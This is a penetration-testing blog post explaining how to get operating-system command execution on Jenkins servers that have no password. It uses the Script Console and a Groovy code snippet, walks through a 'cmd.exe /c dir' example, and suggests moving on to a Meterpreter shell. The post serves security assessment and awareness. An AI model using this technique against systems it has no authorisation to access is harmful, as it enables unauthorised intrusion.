Introduction
Here’s a fun trick I have been using on some recent Information Security Assessments to gain an initial foothold. If you aren’t familiar with hacking Jenkins servers, it runs by default on port 8080 and also by default it has no password (Hurray!).
According to their Wiki: “Jenkins is an award-winning application that monitors executions of repeated jobs, such as building a software project or jobs run by cron.” Here is what it looks like.
This is some Groovy script right here
Conveniently, Jenkins has a native interpreter for the “Groovy Script” language which it selflessly offers up to you via the “/script” directory. Click on the “Manage Jenkins” link in the left-hand navigation pane and then “Script Console” from the main menu. Here is what you will find.
Lets have some fun
Now, if you’re like me and you haven’t even heard of Groovy Script much less know how to write in it, you’re in luck because it is in fact 2014 and we all have smart phones with unlimited access to the all powerful Google Machine! Click on a few links here and there skim through a few paragraphs and you’ll see that we can execute some Groovy operating system commands with the following:
def sout = new StringBuffer(), serr = new StringBuffer() def proc = '[INSERT COMMAND]'.execute() proc.consumeProcessOutput(sout, serr) proc.waitForOrKill(1000) println "out> $sout err> $serr"
This doesn’t appear overly complex but for the sake of completeness lets walk through it:
- 1. We declare two objects of type “StringBuffer”. ‘sout’ and ‘serr’
- 2. Next we store the result of running the .execute() method on a string which should be a valid os command in the variable ‘proc’
- 3. Grab the process output using the .consumeProcessOutput() method passing in our two string buffers as per the method definition
- 4. This line just sets a timeout counter that will kill the process if it doesn’t finish on its own
- 5. Finally we print the process output and any errors that were generated
Cool, so that should be easy enough lets paste that into our console window and run some OS commands. All we need to do is substitute “[INSERT COMMAND]” with what we want to run. We’ll start with a simple “dir” command.
Damn! (shouted with an English accent for added flare) we got an error. Alright lets work this out. The error says “Cannot run program “dir”: CreateProcess error=2, The system cannot find the file specified…” Well that makes sense “dir” isn’t a file on the target system it is a component to cmd.exe. Lets tell Jenkins to run that instead.
Getting closer. So from the looks of it Groovy Script just spawned an instance of cmd.exe however we can’t interact with it. So lets try passing a command via the /C parameter. “cmd.exe /c dir” should do the trick I think.
Conclusion
So there you have it. A simple, one line at a time command execution gateway. A valuable find when Penetration Testing. Surely you can think of creative ways to turn this access into something bigger and better like a Meterpreter shell, I’ll leave that piece up to you. Also, its worth noting that there is a Metasploit module for this already. I have yet to be successful with it but you might have different results so be sure to check it out. Jenkins Script-Console Java Execution Thank you for reading and as always, hack responsibly!
The post Hacking Jenkins Servers With No Password appeared first on Pentest Geek - Penetration Testing - Infosec Professionals.